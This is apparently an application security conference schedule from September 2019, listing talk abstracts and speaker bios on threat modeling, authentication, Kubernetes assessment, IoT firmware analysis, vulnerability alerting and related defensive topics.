Most people do threat modeling by documenting risk textually but visual representations can be powerful. This talk will show listeners how to build flow diagrams to analyze system risk using graphical tools. We’ll explore flow diagram components and how to graph them using a whiteboard and vector graphics software. We’ll also see how to create the diagrams as code using Python with the open source tool pytm. Putting your threat model in code allows you to refactor the model easily. It also gives you the freedom to generate multiple type of views from the same input and reuse parts of the model easily.

While serving as an introduction, this presentation also gives away a few tricks to make threat modeling handy in the real world. With flow diagrams, having a clear one pager with information at a glance offer some advantages over other detailed methods. For example, adding a simple security controls table on the same page can be used as a way of communicating requirements to development teams.

Modeling concepts will be demonstrated using different examples that are part of an OWASP Project collecting open sourced diagrams.

Speakers
avatar for Jonathan Marcil

Jonathan Marcil

Application Security Engineer, Twitch
Jonathan has created over a hundred threat models during his career and enjoys sharing his experience. He currently leads the OWASP Media Project and is a board member of the OWASP Orange County chapter located in beautiful Irvine, California. Originally from Montreal, he was the... Read More →


Friday September 13, 2019 3:30pm - 4:15pm
Lincoln 2

3:30pm

Salesforce Data Governance: What dark secrets lurk in your instance?
Salesforce only has Sales and Marketing information, right? WRONG!

Over the years, Salesforce has grown and evolved exponentially. Companies are leveraging Salesforce in many ways, adding even more sensitive customer data to the platform. While Salesforce is very secure, it’s still a platform that can be implemented in a way that puts your org at risk.

So how do you know Salesforce is implemented in a way that meets your compliance needs? And how do you actually align your Salesforce implementation to your Security Posture?

It all starts with Data Governance, the foundation for Salesforce security. Data Governance provides the ability to effectively manage data using appropriate controls throughout the information lifecycle process to meet various internal and external requirements.

We’ll explain the basics and then dive into the more complex topics on how Salesforce, the lifecycle of customer data, and regulatory compliance can all effectively co-exist. We will explain the capabilities available to implement the 4 pillars of Data Governance (Data Inventory, Data Security, Data Privacy and Data Compliance).

You’ll walk away with tangible next steps for governing Salesforce, like data classification, access management, encryption at rest, user access management, compliance reporting and more.

Learn the nuances of Salesforce and what questions to ask your Salesforce team to ensure Salesforce is implemented in a way that aligns to your Security Posture!

Speakers
avatar for Patrick Fields

Patrick Fields

Account Executive, RevCult
Patrick Fields is Account Executive – East with RevCult, tasked with leading the firm’s sales efforts with clients based in the Eastern United States. Mr. Fields is an experienced information security sales executive with a background in Governance, Risk and Compliance (GRC... Read More →


Friday September 13, 2019 3:30pm - 4:15pm
Lincoln 3

3:30pm

How to Fix the Diversity Gap in Cybersecurity
Women make up just 11 percent and minorities are slightly less than 12 percent of the cybersecurity workforce. Also, only 4% of hackers are women. Coming from a nonprofit background, which is an industry with a high diversity, to one where it is so unbalanced. It’s disheartening and I’ve connected with persons who are underrepresented in the field, and many after spending years in cybersecurity are leaving the field. From their shared experiences as well as my own, it is clear that the cybersecurity space needs to get real about the lack of diversity in the space, and the necessity to make changes as we approach the estimated shortage of 1.5 million cybersecurity professionals in In this talk, we will discuss our brains and how we label and prejudge, hear experiences of underrepresented people in the space, what can be done to fill the gap, and how to increase and retain the number of qualified candidates in cybersecurity.

Speakers
avatar for Chloe Messdaghi

Chloe Messdaghi

VP of Strategy, Point3 Security
Chloé Messdaghi is the VP of Strategy at Point3 Security.  She is a security researcher advocate who pushes for hacker rights, and strongly believes that information security is a humanitarian issue. Besides her passion to keep people safe and empowered online & offline, she is... Read More →


Friday September 13, 2019 3:30pm - 4:15pm
Lincoln 6

3:30pm

Who Dis? The Right Way to Authenticate
Online verification of identity today extends across microservices, cloud providers, IoT devices, emerging systems and end user. In a brief study we conducted on 100 most visited websites, over 95% supported authenticated sessions with more than 97% of these are username and password based. 81% of discovered breaches are due to broken authentication, indicate there is still a problem to solve and this is the focus of our talk.

Developers are generally aware of different authentication methods used for secure interaction between these entities, but most often miss out on best practices. In this context, we discuss popular authentication schemes like SAML, OAuth, token, magic links, adopted by developers today and emerging ones like WebAuthN. We will present incorrectly coded authentication patterns observed from our study and also highlight recurring mistakes like MFA bypass, token leakages and other authentication misconfigurations. Finally, we provide secure blueprints that developers can leverage to bake security into their software development lifecycle.

Speakers
avatar for Dhivya Chandramouleeswaran

Dhivya Chandramouleeswaran

Security Engineer, Lyft
Dhivya Chandramouleeswaran is a security engineer at Lyft providing proactive security guidance to key product teams. She develops security automation tools and enjoys reviewing the security of new technologies. She has given talks at OWASP App Sec DC, Defcon BTV, CSA summit and BSides... Read More →
avatar for Lakshmi Sudheer

Lakshmi Sudheer

Security Researcher
Lakshmi Sudheer is a Security Researcher. She has been in the security industry for about four years now. She works on reviewing architectures and providing security guidelines to various product teams. Prior to this, she was at a startup doing all things Application Security and... Read More →


Friday September 13, 2019 3:30pm - 4:15pm
Lincoln 4

3:30pm

SEDATED
Prevent Sensitive Data (creds/tokens) from being pushed to git repos. FREE T-SHIRTS for those in attendance!

Speakers
avatar for Dennis Kennedy

Dennis Kennedy

Application Security Engineer, Allstate
Currently works as an Application Security Engineer for Allstate, since 2017. Working with application development teams to build security into their applications and raise awareness of the importance of application security through demonstrations and presentations on various topics... Read More →


Friday September 13, 2019 3:30pm - 4:15pm
Virginia A

3:30pm

Swimming with the kubectl fish: the why, the how, the what of the CNCF Kubernetes Assessment
Trail of Bits participated in the first wide-scale assessment of Kubernetes for the CNCF. This talk
relays the unique challenges presented by both Kubernetes, the focus of the
assessment, as well as some of the more interesting findings. We will present three
over-arching themes of the Kubernetes code base, and how these patterns influence the system as a whole.

Speakers
SE

Stefan Edwards

Principal Security Engineer, Trail of Bits
Stefan performs assurance work across a variety of verticals, from blockchain to IoT to Defense. In addition, he’s heavily involved in our infrastructure and architecture review work, and makes discerning comments in our reports. Prior to Trail of Bits, Stefan worked at nVisium... Read More →


Friday September 13, 2019 3:30pm - 4:15pm
Lincoln 5

4:30pm

The Zest of ZAP: How scripting in our favorite tool can bridge the gap between dev teams and security
Security testing has a reputation for being mysteriously technical and conceptually unapproachable to many in the field of technology; they know it's important on some level but still, approach security as mysticism and superstition rather than technical reality. Simultaneously, the average security team is too overloaded to help guide the daily needs of those very same teams.

While this operational gap can be large, it does not need to be accepted as truth, and by using OWASP ZAP and its handy scripting engines we will explore the ways in which we can use such an application as a testing tool for development teams in a way that both enhances the quality of assertions in the current QA arsenal for exploratory, functional, regression, integration and automated test process. By so doing, it will also provide a natural springboard from which to incorporate security concerns, concepts, and education.

Speakers
avatar for Peter Hauschulz

Peter Hauschulz

Software Test Engineer/Security Tester, HumanIT
Peter is a Software Test Engineer/Security Tester who holds a bachelor’s degree in Psychology and Integrative Physiology, with a focus on the influence of group perception, behavior, and pathology. His work experiences include a wide range of oddities beyond computers, from shelving... Read More →


Friday September 13, 2019 4:30pm - 5:15pm
Lincoln 2

4:30pm

Pilots, Surgeons and Developers - Improving Application Security With Checklists
Multiple studies have shown measurable reductions in risk and improved outcomes in both aviation and medicine when participants follow well documented, basic processes enforced with lightweight checklists. Using a checklist ensures that common risks are consistently eliminated or minimized and reduces regressions.

In this session you will build an application security checklist customized for your specific technology needs. The checklist you build can be used by development, operations and/or security teams to improve the application security posture of your applications and minimize the risk of releasing vulnerabilities into production.

Speakers
avatar for Joe Kuemerle

Joe Kuemerle

Security Engineer
Joe Kuemerle is an application security engineer, developer and speaker in the greater New York City area specializing in application security, development, database and application lifecycle topics. Joe is active in the technical community as well as a speaker at local, regional... Read More →


Friday September 13, 2019 4:30pm - 5:15pm
Lincoln 3

4:30pm

Testing with your left foot forward
DevOps has brought many benefits to security - SAST and SCA security tools have been baked into build pipelines. To some extent, even automated DAST has been integrated into our build pipelines. However, this leaves a gap with manual testing. Manual assessments occur, be it in house or via bug bounties, and at best we can automate the delivery of our results into a defect tracker like Jira. However, this just adds to the backlog - we can do better. This talk will explore how manual testing efforts can - using standard, pre-existing dev & QA tools - be more tightly coupled into the build pipeline and drive faster remediation.

Speakers
avatar for Jeremy Long

Jeremy Long

Principal Engineer
Jeremy Long is a principal engineer at a large financial institution. He specializes in securing the SDLC via secure development training, security requirements and coding standards, tooling for early identification in build pipelines, etc. He has a deep understanding of static analysis... Read More →


Friday September 13, 2019 4:30pm - 5:15pm
Lincoln 6

4:30pm

IoT AppSec: Automatic Security Analysis of IoT Firmware
This talk is the result of a 6 month long person project of mine to automatically, unpack and analyze IoT firmware for common security issues, with a nice web GUI to boot. ByteSweep is a Free Software platform that automates a lot of the common steps I conduct manually when performing IoT pentests. ByteSweep utilizes the python libraries provides by binwalk to programatically extract filesystems from firmware images. In order to extract crypto keys and password hashes hard coded into firmware images, ByteSweep implements a custom strings regex search engine with configurable rules stored in a config file. Radare2's python r2pipe library is used to analyze extracted binaries for any unsafe function calls. (e.g. strcpy, sprintf, system, etc.) Version strings are extracted, using the strings regex search engine, from 3rd party components like open source programs and/or libraries. These version numbers are then compared against software version associated with CVEs by using the NVD JSON Data Feed.

My talk will feature live demos of the ByteSweep platform but I'll pre-record them all in case of failure.

ByteSweep Licensing:
* Web Frontend: AGPLv3
* Backend Worker: GPLv3



Speakers
avatar for Matt Brown

Matt Brown

Iot Pentester
Matt Brown (nmatt) works by day as an infosec professional and by night as a Free Software hacker. His interests in IoT security began at his first defcon (23) where he placed 2nd in the IoT CTF. Today, Matt works as an internal IoT pentester for a major home security company. Matt... Read More →


Friday September 13, 2019 4:30pm - 5:15pm
Lincoln 4

4:30pm

Defect Dojo
Speakers
avatar for Matt Tesauro

Matt Tesauro

Matt Tesauro is currently establishing a SDLC at a large healthcare software provider. Prior to his current role, he was a Senior AppSec Engineer building an AppSec Pipeline and continuous security program for Duo Security. Previously, he was a founder and CTO of 10Security, a Senior... Read More →


Friday September 13, 2019 4:30pm - 5:15pm
Virginia A

4:30pm

Real Time Vulnerability Alerting by Using Principles from the United States Tsunami Warning Center
Vulnerabilities and attacks are like tsunamis caused by earthquakes that hit without warning, causing high damage and leave us scrambling. Although one cannot predict earthquakes, there are two Tsunami warning systems operated by NOAA in United States which produce reliable results in the nick of time. Based on the same core concepts and principles we have built an open source Vulnerability Warning Center that alerts on highly seismic vulnerabilities before they hit your organization shore.

In this session we will demonstrate how a real time vulnerability alerting system can be built in AWS cloud using public data. With more than 2000 unique vulnerabilities disclosed every month CSOs and security practitioners have an impossible task of cutting through the noise and prioritize the most critical issues for remediation. And doing this daily is excruciating and weekly is too slow. Won't it be nice if there was an automated system that alerted on the most gruesome high-profile vulnerabilities in real time to produce actionable insights?

Unlike getting data from honeypots and sensors, we decided to take a different approach to harnessed public data on attacks, exploits, data leaks, vulnerabilities, blogs, twitter and numerous other data points to create simple alerts and graphs that warn on actionable insights in real time. The system in this initial phase itself has shown remarkable results which we will demonstrate to the audience. In the live demo we will ask the audience to pick a day or week or month and demonstrate the system's capability to identify the most pressing security vulnerabilities during that timeframe.

We will examine the design and implementation details to show how the system can the noise and rank the most relevant real-time vulnerability information. We believe that we have just scratched the surface and in the future, we plan to implant NLP with AI and ML to process even more public data from different regions, languages and sources that will increase coverage, accuracy and industries that are currently targeted by the system. To conclude, we will demonstrate that a system based on public data can accurately and in real-time curate, identify and prioritize high priority vulnerabilities to provide actionable insights.

Speakers
avatar for Amol Sarwate

Amol Sarwate

Head of Security Research, CloudPassage Inc.
Amol Sarwate heads CloudPassage worldwide security research responsible for cloud focused vulnerability and compliance research. He has devoted his career to protecting, securing and educating the community from security threats. Sarwate has presented his research on vulnerability... Read More →


Friday September 13, 2019 4:30pm - 5:15pm
Lincoln 5